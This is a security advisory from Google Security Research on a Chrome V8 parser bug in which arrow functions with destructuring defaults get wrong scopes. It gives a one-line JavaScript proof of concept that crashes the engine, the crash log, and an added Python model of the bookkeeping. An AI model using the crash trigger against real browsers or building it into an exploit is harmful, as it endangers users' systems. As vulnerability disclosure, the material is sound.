Chrome V8 JIT - Arrow Function Scope Fixing Bug
Source: Google Security Research  Author: Google  Published: 2018-04-26
/*
When the parser parses the parameter list of an arrow function containing destructuring assignments, it cannot tell whether those assignments are really parameters (with default values) or just ordinary assignment expressions until it meets a "=>" token. So it first assigns the destructuring assignments to the outer scope, and fixes the scope when it meets the "=>" token.
 
Here are the methods used to fix the scope (https://cs.chromium.org/chromium/src/v8/src/parsing/parser-base.h?rcl=787ecbb389741d2b76131f9fa526374a0dbfcff6&l=407).
 
    void RewindDestructuringAssignments(int pos) {
      destructuring_assignments_to_rewrite_.Rewind(pos);
    }
 
    void SetDestructuringAssignmentsScope(int pos, Scope* scope) {
      for (int i = pos; i < destructuring_assignments_to_rewrite_.length();
           ++i) {
        destructuring_assignments_to_rewrite_[i]->set_scope(scope);
      }
    }
 
Since the SetDestructuringAssignmentsScope method changes the scope of every entry from "pos" to the end of the list, the RewindDestructuringAssignments method needs to be called after fixing the scope, so that an enclosing fix-up does not touch those entries again. But the RewindDestructuringAssignments method is only called when the arrow function's body starts with a "{" token (https://cs.chromium.org/chromium/src/v8/src/parsing/parser-base.h?rcl=787ecbb389741d2b76131f9fa526374a0dbfcff6&l=4418).
 
So it cannot properly handle the following case, where a destructuring assignment expression contains a single-line (expression-bodied) arrow function: the inner arrow function's destructuring assignments are never rewound, so the outer arrow function's fix-up re-scopes them to the outer arrow function's scope.
 
PoC:
*/
 
(({a = (async ({b = {a = c} = {
    a: 0x1234
}}) => 1)({})}, c) => 1)({});
 
/*
Log:
Received signal 10 BUS_ADRERR 12340000001f
 
==== C stack trace ===============================
 
 [0x00010edde85e]
 [0x7fff53e54f5a]
 [0x000000000000]
 [0x7eb48331b6d8]
 [0x7eb48331b6d8]
[end of stack trace]
Bus error: 10
*/
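The following is an added illustration, not V8 code and not part of the original report: a simplified Python model of the destructuring_assignments_to_rewrite_ bookkeeping described above. It replays the nesting in the PoC (one destructuring pattern for the outer arrow function, two for the inner one, all first queued in the enclosing scope) and applies the inner and outer "=>" fix-ups in order. The names Scope, DestructuringAssignment, ParserModel and simulate, the scope labels, and the shortened assignment texts are all constructed for this example; rewind_after_fix=False models the PoC's expression-bodied inner arrow (no rewind), rewind_after_fix=True models a block-bodied arrow where RewindDestructuringAssignments runs.

```python
# Simplified model of V8's destructuring-assignment scope fixing.
# Added example, not V8 code; all names and scope labels are constructed.
from __future__ import annotations

from dataclasses import dataclass


@dataclass
class Scope:
    name: str


@dataclass
class DestructuringAssignment:
    text: str
    scope: Scope


class ParserModel:
    """Models destructuring_assignments_to_rewrite_ and its two fix-up methods."""

    def __init__(self, rewind_after_fix: bool):
        # True models a '{'-bodied arrow function (rewind runs after the fix);
        # False models the expression-bodied arrow in the PoC (no rewind).
        self.rewind_after_fix = rewind_after_fix
        self.pending: list[DestructuringAssignment] = []

    def record(self, text: str, scope: Scope) -> DestructuringAssignment:
        # Before "=>" is seen, every destructuring assignment is queued with
        # the enclosing scope, because the parser cannot yet tell whether it
        # is a parameter pattern or a plain assignment expression.
        entry = DestructuringAssignment(text, scope)
        self.pending.append(entry)
        return entry

    def fix_arrow_params(self, pos: int, arrow_scope: Scope) -> None:
        # SetDestructuringAssignmentsScope: re-scope from pos to end of list.
        for entry in self.pending[pos:]:
            entry.scope = arrow_scope
        if self.rewind_after_fix:
            # RewindDestructuringAssignments: drop the entries now owned by
            # this arrow function so an enclosing fix-up cannot touch them.
            del self.pending[pos:]


def simulate(rewind_after_fix: bool) -> dict[str, str]:
    """Replay the PoC's nesting; return each assignment's final scope name."""
    script = Scope("script")
    outer_arrow = Scope("outer-arrow")
    inner_arrow = Scope("inner-arrow")
    parser = ParserModel(rewind_after_fix)

    outer_pos = len(parser.pending)                  # outer '(' seen, pos = 0
    a0 = parser.record("{a = (async ...)({})}", script)
    inner_pos = len(parser.pending)                  # inner '(' seen, pos = 1
    a1 = parser.record("{b = {a = c} = {a: 0x1234}}", script)
    a2 = parser.record("{a = c} = {a: 0x1234}", script)

    parser.fix_arrow_params(inner_pos, inner_arrow)  # inner "=>" reached
    parser.fix_arrow_params(outer_pos, outer_arrow)  # outer "=>" reached
    return {entry.text: entry.scope.name for entry in (a0, a1, a2)}


if __name__ == "__main__":
    for label, flag in (("no rewind (PoC)", False), ("with rewind", True)):
        print(label)
        for text, scope_name in simulate(flag).items():
            print(f"  {text:32} -> {scope_name}")
```

Without the rewind, the inner arrow's two patterns are still in the list when the outer "=>" is reached, so the outer fix-up overwrites their scope; with the rewind, only the outer pattern is left for the outer fix-up and the inner patterns keep the inner arrow's scope.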
 